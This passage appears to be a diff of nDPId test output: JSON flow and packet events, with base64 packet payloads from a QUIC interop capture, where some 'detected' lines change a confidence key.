TB2ijlN5mXKs6fM7HXB7edk1jJ2vRSPS\/Sd1iJC6K7IVGG+b05Hvoqeh26GxYLnmUShKxodNsm5bqP4KQTECZRHJGO5bC3iH2e9AmHFRtcJuV0TEnymRBdJso15Mw5WSKs6MiqZOUVTNhH\/pBSIvkiB59cpoQ2kryiNnrZYHeBm0GW1xHBJINLpHgWU+YOcS01DrnAzJKiAR++TsJqZLlDgEWdgltoevZ9gIp62LQq23k1aN8sOGWxJHB6SR2oFKCim70PXdVeVV2H14toHpbqvnGJ5OQ5TAo9F8H1kILTASoi7zMbCXU+ihgxAsvPHQ0ma57WHD5eEfq+qwnIiOkWrwxRNyE378pWGBYwI8oYScRtd2e51pW5YbrsHNUZOF1BRwr4kRNdeYmvBnBCWqp1oBtltIzrn\/Gfcg3DcXmKdv+wNqmSl5ckBYOsYJvjs7+A0lZkaQsFSCJS6cHnp21uzZtbuJMxnGuFlucbDvkJrbZFiIDRi1zfBizG5xYGqI2LuZiKga47IwNdNLC8VwTruNg1oItufwg14MMC+X8kARERXQPJMtpnlcPMl3ZXZ+eP3TlPgYKElfm8xvSbmiMo\/gyHVDPysxCqGIaONg8hr1XRFRbXCrsQZqBHdR1BEHr2erluZx33TA9nEW4ljFgCY54FmKcPcThHKkex0pfCGVG0rDwn5CMiYlKCqMkq82agukv3RtcLDwavHHxrRJ4GFUlIajj9luP5Su+tOXWCKfvD7RL2peHKYq0oE1i9rkQ3J+6rPx1pfTLMCYUSGyR2ULLEVyAXotaIxy15QIlAlmWMZrgC+hXiaIxq+hUyINFVkc4FAkBBRAU3EDU5yTv1VQUZR++HeJPUvDn0Ly7STUB7C9GMGsanejmwI9FYR1azwvEiMPzo62YRjgMbM2H450bCbY\/ihQkhW6vCoJACsZGMust90L1tttL0aGDUuM2ekxmmP2SR2XGKJhksWGNk4Qk8NcSbtQGw4rBlTHKDoA+TNa0noiVD30cGIgXZvR4LzxoKJTHmmdOUfJnlbktOUO+L10wT6chVbloEO7Gl6LmuuY63cBoGIu\/9oxZ1fVnf\/qtqp4c5WdmDqlzryd3pEbe\/IAUHs50fQBLfKzcvYMcdoYWKI2XujLzx99HtpnCDcHHfIGi2GBE7lCFUhpHVx\/3REbGwPNIrR5hVqLd9oAN0IWu46FpJq5LdwUTeovYvLw5NA\/DiXOdXc+4fQx+cmbBq4bCo5iPDOTurjVG+AT6KDA=="} 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434818,"flow_last_seen":1603816434818,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434818,"l3_proto":"ip4","src_ip":"18.189.84.245","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 01195{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1603816434818,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":1603816434818,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJAOvYAABwBN+0SvVT1wKgBgAMDupoAAAAARQAFABYUQAAeERf\/wKgBgBK9VPXVKhFSBOwZ0sAKCgoKCEMxhVUtcFhGAABE0qWeLu1BQPCrvaqmOZLxcjaUsYk9VVde3D76gcDL+4IVysNvEgASSqVVEGYaLPIGcbZ3HxJwj7UTPMN9ktHDGQ7OWCRzA6fqhalBV5YwIQEg3hVGDI6qpqitsVwDd8\/MN70IjnRYlLSnGFiFQz\/+37tcMd3B47Z3XUJqAC2gmAtiiG7FB9bVCqu70\/\/gVbe+y8Aiq8lY3pgapL115bg44IU5ONIr0kPIychpXhB4nGil5WtRlR+PfDZaCteJDe8INKJO7W9rCoQHxbJrdHcgp7qNCAvNvwYE3E7IaJzWzZ\/MoUUAYGiQDU5QZNqlmNLsfw7HRz7KL6RKhXKo6arbCoyf+aekhlzkYvXUC6YXLfcX9b\/uhdcExVVj3t3h3bEjsqfwcBC2sK\/3+ftXoClqu\/uJmzlR\/hQg2UZDVSBch9t4LjNi+WntvWr6v5Vi\/KVQ7U43\/Gm4H1rcanEorBOGJAHhmqtXhOThueWcgpRyjQ5+C\/V2Y42zfQkNRgnvzhVV6TCNj3xIlnBpiCnjYGEauIM5QGTgy7j1eEARKu2SqfuTVUmi6oEn63B+sVeMBPtI+6+VRIb69rup\/\/2zzUrMqEGl1Ofqu0NMNJUBI++5TMEJqz8PBpY7++PNBvTXVMJHf\/6eUtUbUHVIf6h+Omvu2jYTq0R6BWM="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434818,"flow_last_seen":1603816434818,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434818,"l3_proto":"ip4","src_ip":"18.189.84.245","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.556211} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434818,"flow_last_seen":1603816434818,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434818,"l3_proto":"ip4","src_ip":"18.189.84.245","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.556211} 02153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1603816434820,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434820,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUApCNAAEARDmLAqAGAjOM0XK5LEVEE7GREwQoKCgoIlk3\/sw8\/b8wAAETS7HTMpNcxINQW3ZN+iCGS1z1IAElwdp\/JkpB1113BzMoCCRTe4FQcqzRNlPfFUuL337y9c\/m0xOQ2BSNabPaJGHp30QAKNdTWLRiE0u0lhDN37WkJ3a18g080qiPj3NOKBzBb6Q2R2eP+Tu5VAgK0JBnSSQxscnBGZYx8erjfdk\/KfB+k80tJ23vgNCBrw5\/QJHyIKFr6T5gcmaoduB6MP68CbMsVTh+UudjvNuCb47BBuKD37H0qZ3vrzszhEdCnaBPaTgDC+BRg\/7zjd8y+\/IMXoc4lcJ6yCEUNd5PMsCArc8JfRjxmtTjKsNnWLKbOCz7De91KYHmwGYzaF+m0hYb600XnI1+GfBH+Yt7Rmih6ZJFb61s4n\/p947s86kVOIDjkRzXFc5rj\/5TsZlNwMgHK1trFOYKfIQD\/nGNPAy3b1yszE1t6bon4A+5+sfdvgO3Pb0vQv7a2RjiEoNWsOgLHHYRaOns5wLvhGDh7p2oiwYoA0dOQULiPA3oPFIYn3l5BexqjNtcP9rDwal7aPEC5NULq7Zmi8SqPrNQKrHxduW\/ejURdhLL6oGYtylwTjf6fFdLzV74euKvQMJtzqOmUVsGs7ytHwIW0zUSVdcXZXNdfHTIBhQmt1LEXywwM9sEku5ONFT5vw3iqnJaeuQ3Z9RVWM6JVZBIIyhtRHSHLMWoMYyVHbzNHU6KHtgRqx4XiFpODAS4ZKLu+YaxH\/jgJPdH9GCKqWFOo09L\/MFa9JOyzZTBHgPL9\/n6dV\/AjYlz2WHUbgl4B47TvtoGesKFiqCifWwa9T\/QAs6VqSsxDxakmj9BwRcyJY9Fh+S0GJgfOD3vdFv7r+qe3nnZPXIMdHvVuagTE0AYBONNrKgYdX4Ky4qhLEEd5cE9ERtsD2WvjOGP2X1nIyl6Z5fwtC4lFzD4HiYxcWYOwEoRb4XOLMLjHU1VRqf56Q7VOoNVljrqpfUTD3\/kymwOaOw9lLI9P78KYSDd0ItN84RFi9m1ZATEA4B8xDEQ0xgm7gZL75Bj+DcL6tIj3M5q5t+D3grLTkPWXTTA36Ac5nJ553GrmMeyNqRY+oz7\/jmpae2pHhn5y5a\/JNHh99ySrjiURwgTDidnXFv\/avhfUTEIKYf9vmF1mBR2BjGIWblU\/xSsHPpQooMBCE1pv+edhptbedN01raww3dKDhm8PKg0\/39zcyjrIDUoGuCyt7fcWYxL1rSfHDWFvTo3rOPuLREGMhWKH0rTw1rfsvP7pj9wRWFuq+5bjg1YEYzOa+4ow\/G36iMyOEYXSETkFxk1k9PKRQcdv+hmZ7Yysh6jGqSQYubSckYOn7rzqjXzTbZJ4cVerQWc6vzgu\/f8kKoOJaHeHCNS3S8Ih7LoFy\/3HhVH9BOwbPs1b8AjTnrabB9wJd2L4xt25UkVcDS6dONKmrmw3h\/i2PdMTiY3wE4W1wVKTbunysVPKp2ppBpsra6Hdm1iIJV6HfCSSXwO8AyqeAGhx5QFqNqN2LYiejuoyXFW2FmijSjtLOK+Ec8dkYkpgamnxA4iCyf\/yyvNIxQuF3Qi\/hZNj\/3Ane7tlBEi6cG9xsu3lWfzaAh0Qz\/MZBLCWHCiMGpcbinSxoJxeieJR4hwsH6aIGBBARlcM87JIeY9evAugxQ=="} 02151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1603816434821,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434821,"pkt":"pJGxgjQ5PKn0qB\/sht1gDnzNBNgRQCABCwcKydWupNP+R2kegH0mAB8YIxDSMFEDfZ59dTdPtKIBuwTYf3DECgoKCgiO5tu+VRPaUgAARL4uI1WmPGK3DVcwUtE9UzI\/fGSOKvWUIfYmoO3D6w75gyG6cAgBjzUk1WiaTNGr26SzX\/zj3x5ZOIMX2zmIddjoIJovY\/VksJrC3pfUCteiUGgedji71vrrn0fRMQEFiIkPaa+o8LGRwzZKy8VL3G9cV5Q0+xLvukUHxPfTXr+qeeoAkO2JrC0axiSb2dt+XmaJ0v8nr3ud+va3668mZsfa5EeFafHaj8m49xF7nuzVpSiWax1aZSZzIz6eskzoc+1ob4msOELhchJT5jSTUaY4j8tszC8K1inc5HuVJQLo8TDvFonmdmM0XKQKaWAqfBpL0CUAHrxZaa7bFxHWCI+KCUFVNkIiEsJLT7NG1KiOxkI4gvAPMqLHQoSqFHaylCrhyi1kFotT2StbIZXec2UmPZu2coK0kaliS7gU+LJp4Q8aOd\/VQfT+XwTsJ91oSb1hOc3RVgo0quwGh5ZyNdKZAdfV8mq\/WMkDj4BcFPubTYXGgusxS\/MyTqzT1EFGuLIWfyAbYZyodoA4VbTOGXJwfjifkHUQ+UF72jq+Pt7WCCIYrTBJQnTBEUt2MXfl7vDq69U1d9nIXWmxmxitkWebhf3a424eVpSg7vx40Hu84MnwnUTI47yC+ao94ZGXsWQUy81CB15Bxl9YeNY2dJgyiP+5AD9Mhxzqup58xGvvgfzwiN+8b9hNWQCIXG3bcsVJVlFTJ+jyJ9stfjENb7psSrJSchNgxcdmCDy8kzTYUD7r2Kyu23la\/A94iZaAc3a3efSo5IpoqV3d1rp5ZAXMrr7FuDpbBbwpjWOv21FHy9XJpndYMkbIqf\/7foTiABMd4OD5ZERwg0xFUm2\/h9OWCHJH83WAL\/V5NLmuNQVhvxqDt4v9kRbwpq1I6YlY65WMno6Jktn5XADL\/7yB9qcTbstxiHDTP9HA52vwZywCZsUeMNyVpwbs6++IutqZF2u1m5rA1TU892YkmC4kF\/6hNawh4kh9uCP\/dmrEgG3fl\/J1TK58qG0QytYAfCJ0cQ5JLCxfl\/NL8mZSVRO1SYiuLHK3ygtYTMGI6vHbmzBIw7efY9+H20\/n9OdFhPZypP\/u3dYpp4p\/C2O0s6ViK29wOFT+K2UH57w75L7qCQIQY8Jmg4QscecIv0AWmnfsG6wos8x03+j\/JR8bgGEsH1SV8kBWJgmpv\/L4R9h36Dkk7I7wbtNl01psL0lyiPNL+Ovmtqzx+\/3Q62hpJ76z0PUEL8rN8W\/mbea\/y56YejegoW0NiHWhNlluWfwxxnN42q0YVuXvbq45KHAswsaiAvSLHS1\/Hfet1IEJQbT92EAZjtTIJs1ukk6S8C7JBdY2mP1nien9nfYAxxwA\/H5mWvSq0j8RX\/AxShyK\/7L5A8yyjy03hGEmr9rECJ4SlYdMS5IlK68iFiJ4CMvIJ+6AyWXezGevi+5ey4ofkQCxFpY1W0uO7lu7+1aV90Ifn3KxnAwNm6+ry4yHqk6IaT4+FTyUTD70bZ5KtnE5J0z9NnVQAnXfMQNLWwACkQ3k4t1jyk2PI9+I4B+PL+e\/IT7Vzp7naSY2nO4exFruJXfEn4uVZmLymCx9K0eX21XvezrLYl21gesFXXXoMBP7pIhtLQ=="} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1603816434822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1603816434822,"pkt":"PKn0qB\/spJGxgjQ5ht1gCEs0ACMR8CoF0BgM6YEAzSri\/bO+xasgAQsHCsnVrqTT\/kdpHoB9EVKuPQAj8mT+AAAAAAAIITUj3tZzyB\/\/AAAd\/wAAHP8AABs="} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1603816434822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":113,"pkt_l4_len":59,"thread_ts_msec":1603816434822,"pkt":"PKn0qB\/spJGxgjQ5ht1gAGSQADsRMCYAHxgjENIwUQN9nn11N08gAQsHCsnVrqTT\/kdpHoB9EVGV+gA7uJfFAAAAAAAIQysxrQYDr8z\/AAAg\/wAAH\/8AAB3\/AAAe\/wAAHP8AABtQQ1ExUENRMDpa+to="} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434822,"flow_last_seen":1603816434822,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434822,"l3_proto":"ip6","src_ip":"2604:a880:800:a1::1279:3001","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1603816434822,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434822,"pkt":"PKn0qB\/spJGxgjQ5ht1gAFucBNg6MyYEqIAIAAChAAAAABJ5MAEgAQsHCsnVrqTT\/kdpHoB9AQQ1AwAAAABgCGnqBNgRMiABCwcKydWupNP+R2kegH0mBKiACAAAoQAAAAASeTAB2wkBuwTYmHTJCgoKCggVxSlYpn4UkgAARL5ZLsODdf27vLuu6GHs9eSXiVxIAlfs7TcHZcazXn4JE3\/P5JDqe+tOVWQWmWJiN1Zi+QMXxBMeLDuq2FFgXlL2mFN2Y0Hpqzt32q0IcYNEtodCx0cCDcymndGz22NucmhqDhsBTfQYSZ0TGfZ0Y1dj7OIdkztU4UKtQk0Knbx0pPfOb04IoU66JRugmLaY3NcS6\/YWs3i+G\/Z1NaiZhF7wHXHAr7RtRzKLb2gPHbqV9JkwnbYNdieDzqo6OGYxfFJAF9UdpTyC5RofrFHDOiAzzOkMjstRpfIx0da81MZNBFjRQx8VBZVl5cb5VmHHCRKqUJJ\/pimnlqr6\/rH78B0tJyJdMLcbA0k\/GEaMgb2r9k+khrfN+IYPTP9LEK9IyC61PSNuLM7lCBCfjRBxaONHiGk0HUucFiwpQMj72lTAGTUsQa8qFngN+9r0I8HgvmsmOXC4IyatQFicI6JIBY\/\/xLWv+tugw\/qAeO1niZ+nJFTAbwyvKydJ4CrRCQplld36lx1IDKeajrlxvSY4TO7ZlmYtBTR\/QIZQ1n0y7WxFPForSvTZ5LmkvmQy\/XOIdCHzDT+yu3OG+dlOa05oJSJ5squ1DJvlYS4iSqaRgDu8O1f9s7zQOTQDTlP6inO815rKmw1YpQze+QAPS9Ar8Eh6loMYvm597mpGIaaCjBGmRjM30Y3EWQUMoVmSMYlr+ndlJs0\/parg\/PrflXFNfkn\/Wllw4cvS+JLWNhoBBJwDWpM9YkqIgN6sP6Sf1ACXsEwIhZbB5T3Y+mzlz1fEroyxtSisqFOFlOCB2g0djczdb72gMhUvdB4kROfNLNOm8f4hG1ZnJraoSrQJwgrY+zsLAidSwY62GHtAM9fUNITWGPk7OLfW3OjEbL6sh7ywY+xM+yu0nYlxg0Z8ST6zlbK88Dw9rVrViSQ3Oke1RR\/RShjWSOBcuUxTcA\/eXi5dEcOdrVm6ZsDQ0chPleXisZB4yI9mZgj+jwkM4eFcO6OX8YpKRHpSZrb0SkaAHjgOICK+1d\/ehnzz7M0KNYGDy8XZ08SS3gXJzSNXZLonqI\/bweWJiS+9rlVrB5J5IwRHJDEVN2aAZJbdqAdmcFPCL7XDwYisg0GfcM\/dL5C5xxZS6hZbPHwzwJ6y7r6\/T+A0XWV92UuetwR0QSUywswmbazFGMC\/MBz94jyq\/TrHbvq8OgHad29+CNuQfDZZomN6lJoFhgu1iOIbRwea4vmYiVysTLFxxLhym6vQpFJXvihZGX2xoV1bucff9DyhT5\/Wm8sYVpYS8i2GcM3jWfruzg6rk0SVDY6hf8HFcXkvUJGnDN4KwlwULBiTr9COS06u3di2jUKJqL6FFXM1FtZVzdRf3O\/3GNXJ2HDuA4IlWQXWMcKwj7HbOKOWlf39BkQPYBB\/3CwqDH5TkC7Ny98BmDT6ZzxJIZcSDCUoAZ3M1Es1K7QjuPUiIJlOZZ8vmraAuL1z0zGli+qvbM5O\/6zJbeqSM2M0z0mrGA7v66IfdcHwb0k8mj2tM2aIyHApEXwJPFbWKxWcFb4yW1jdVDOO0Q=="} -00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434822,"flow_last_seen":1603816434822,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434822,"l3_proto":"ip6","src_ip":"2604:a880:800:a1::1279:3001","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434822,"flow_last_seen":1603816434822,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434822,"l3_proto":"ip6","src_ip":"2604:a880:800:a1::1279:3001","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 02151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1603816434831,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434831,"pkt":"PKn0qB\/spJGxgjQ5ht1gDK7JBNg6MyABGfAABAA0AAAAAAAAAAEgAQsHCsnVrqTT\/kdpHoB9AQRVHgAAAABgDJNoBNgRMiABCwcKydWupNP+R2kegH0gARnwAAQANAAAAAAAAAABqn0BuwTYttHMCgoKCgiHmjxz9S5+NQAARL60MndZKQNzXHuWbuWII8yYjx1QNcGEa3n\/tA\/kZwZdo0+NMbEhrCvw4fqUesktNwPhDHylUS4gcbEvHHb8Knr61qY95Pm5VKwq10YKtyHKrPUvOt6FFf4EaXlhbjCjP5PNGMuBPWvET6CR\/DNJ3amwoZ8AEiUkCCce2IA0+qLjflDvOu19oZVQSJhyk0ID2QUVFxDX+RIo\/BCEiyqGwrxxtUHNgSlpQhvXLPkd7gs0O8q\/1O3MXjjXw3VV1HTEIvgh9CIZHImqbItBAkHFYhj85297ojhzntlLLEMQUeWyYcLZaQRQLAnNxNHIfLFBwCs6Cttccxk8XUgObPlTQVTnnGvEYXJadvbFnkb5nj0E7bmqr23E\/kns4IXbYRFlEjJZfAc6UWDdSOXBoZHXMIAY\/dztkylxbqayCWGkn8v3wQJvR2xFoTyKE+Pp5saXn2uSt4EYi00Uf6fCGbypDRgDr6HED25efO5iFC99NJvuET7V90ObiIxoji+jOYwIL0BCHSm+uFeO8i7r3GmYR0Qg2iAiX6ZmlOl5gmCd40kAXe9Lo\/pKr3+r853YnPdtRNoIckFL+PsGubjlWj714eDNDRnoSoHs8UNwnNN8sF12pzQsAVr7qLBt4e8KWXFMXfkfIKWSnJhvivGIVrhMeN4RiaQ\/jippacCl0CUjlR9AUDC7DyDOswJ0+eP9X+z1Kkt7EaP13RXwGDeKbPLk\/tVc3ZXQShkobo74qelkPT7nbFmTZB78n2grmfmy0C6HMQ+qUHKH\/MfqCCK2ZnmHVM8veaHwzWHFJ4gVd2h5wLXlBRQqCB2AZzoyKpcMZFNpfGh+rTCIwQTyVZzycWPvtrbHzPNg+tUe1i\/foBt0+XApuoCCwHOsgf9nS7IFS3h97hfCh2TYTKBM6t9C3VPFYDuKYfUjriuP3G2Eq7sMAiqBDef1fYGxLN\/Dys1ZS2B2n+Zqt6K1diQtrzsIwKlRRg+XjfSSzPOVrKeXYenyNePWIMOs4YVAyvkFPV4RM\/osDQvZvShUA0iRuuMPCsj024c7WYx9lDihj4EJBymWsIkTQg0x6rfvVrFojeVlS8zgiytvfAIJsOr+k34t3NbLaK0YyfFcVKBnFDiEC5OcAMd0yi6ouvtE9rJyb\/CiH+Vtx9OSGkbowLLyCHtZ1EUgA0\/vr\/mU+ea4hE\/dLdDDjWwxrJg1oKjnYeHQvIDUT0MVaXTlMXS7\/F6HA7\/5QTayU5MU3hKtpwhACAx5gHHhue3iTscqXigKQ7oiaLOdxRIJ2wKmzNzvQPCG5UmOLnsbM\/3lI+SzzLjMM5HxKsnb7yJmS6z2+tdEoxPOa5ZNm7Wc1LoGgLZd+x+V88MeQDFaBDMQHNWCS8z7Ruv7Q8Jc\/JKShee1avRiWD+QjKfpjPULJzGhq8IhO+3xUZoq\/xSnX5PQ7xqYQY3oim9xsL+ADJPPe0oE2O\/lbNfbGhouInwUUVqUmdk\/fion2o\/ylxCHaGoB6j8tJgJq8ystdV8ErJCcEhkKohD7qeUu1YL\/exHAdFqCo5yGAJyVZFmJD6CkMA=="} 02148{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1603816434836,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434836,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAiNlAAEARQ6DAqAGAyu7cXIm\/EVIE7N5MyAoKCgoIV4qr8UTBK3QAAETSZYQqq5\/hhyGtCz3Zmoi9jrKsnf3wjCZq1mxPTTEfXwdslpFlNBBYDqBuOo+QKDkWn4ZFD\/5qQ8sD8A+lBYGJV+nw5hbll6er2441gO5dAvGVUTjoFTcs61bhJdzOUrux599yFBfTAFDZKYhyBebkHPNDrNvPvVpxfBpxhEGHEq59jbH7Kx56FJtjtSZa9HQG\/OGEFc4JVYBfZDPBXIhzLUdX2JND3qWMQuwP2Xy5LdfjKHYwwsqNQgrtYOT1t6v+Zvqju\/oAictN1dRCuNXP91Pwy5MQysbtofZHqB7e2yb+jFxm4ZMqy+00qpKT7ne5IWIOVRZxjqMikenSsN73RG+rLd\/uLSPXcSlufRT\/qpMuPbNQ6s7DEcokvc85KmowVE9PiWIPrZuSb0oRHuoTyejJTscJK3si7Et7GQNCLhwsIS2k6fsRMPFVceoIZZfXs2PzKq3\/O9EH2D79eeGzP8A5iwmMT7Aab8l3\/6R8LVM6+3PQfPi4jLK+XHWMQbg41\/J9uEQZI5HuTWWQzwcn9UAcG0g4gwcOPmZDzviupQ5tg+\/9eADTReJpa4xS3oYZdywwA3VZsNHvhQf4dL7aplXzKSWQO9B68xf5V1q4gM+CvIJUrE82UCwH8VaOoe1AoHNWtyDW0Ap5d2vSy04x+4EyhLNBj26v3fhqsQcn6Z6a4KwdLKikQaoiVxarNgN+CFr1yDWsPRCqJMe40bhwuS4sWkiGWh8Cv9gLXeNDdRPqaqgBh82GLE7iFA\/U5vdRjLNfTPPFimOZbexduSJLGwwVJejCCwbDdk7Vba1zDnWr6vIMpidFE15bqu1CaUX4wOlMw+UlJ\/Rck\/7v\/g8MgCArdyT52lbEFkxfiUbz9r7dzxe9yAYfnvExfNJocGmNo8cp9UGEZb+Z+fpXkVwNrnTpe82QFjYekWIeghnThVtpzRW6HVEFowML2gXzrgBYWnXVabb+z8NJa9KhgDfRxGY6Qmo7vTY41l2P1aqPcxNOTuIr8rCBIdn5egFmlP6+j3I3zePWc7fsh+HpzbSu2qNxOPfDHrqGgaMf65DyMBQwQD\/2tXTWsn7Vrz+vyWwxpeVt4t+pbwKmIHhkkdrbIJF9mTZzSgQFhOrxmOkT\/t3tmzM4BHRcRs6UQmLnryAbmkEWPDFwWiKG5ro9OVh\/yjexJN4pRIEK9lXHUYCFUgWFM5ofQyZB+jTZyWZLMauwYFWJOs0N1nGD9gUKucMB7p6NqaNEaiwlEG2gf0v2FH9hCslV4oko7fHx3ROpToSYQVimVoCtR9PaGonSHaeqACfo9ua\/Zgtv4cLK6ZiV6DBCf0hDnXZRBh+AaUTWPTe3zcHlDnUHvaFFceiOwKcHKvhC9KWiF3Ddru0uKWSUsFip88BcKpuEabKb0ahOEuMl5XsFJ1\/uDvSVIy33izzMs6n7C\/k4CysougNKX7DiugyzF6BQFi\/VUl9waPfDhomR8hH1euFy1YjY4M2JXUuQh5HV1TzlO4okmnDSo4ios5+eDuKBV4YUuJtBgKFC+X0w\/PUhCXpFy4X3vOqtG4h5S8jL30h+8K84dZjAHTEkJGOvPZIghuHCBB\/bpEvq6Mbt2MCtL\/lIRUUPwjkSauaRIiWSBq1YTOD6X9dULjF3V\/Ewiw=="} 02151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1603816434845,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434845,"pkt":"PKn0qB\/spJGxgjQ5ht1gCSIhBNg6MSABGfAABQwhVAAB\/\/4zO5YgAQsHCsnVrqTT\/kdpHoB9AQTZbQAAAABgAfkDBNgRMiABCwcKydWupNP+R2kegH0gARnwAAUMIVQAAf\/+MzuWlyERUgTYFmvNCgoKCgjw7KzpNo8oeAAARL4tqmRQ5KPAPbdPUnedDn077kKWSLkPygVEwdGpIVFWcp2en9F3ERED+OnUg3d8i8AAkr44lz5aAq3LC+Q212cavhgupcuDcqNoIGhnCIfm+QSZcdNZ4zXfagNI0pLJoRsvOsL\/uXGYxbmgqR94yTDxQ0eUCVIZASIUeRZjEvJCthWVFT2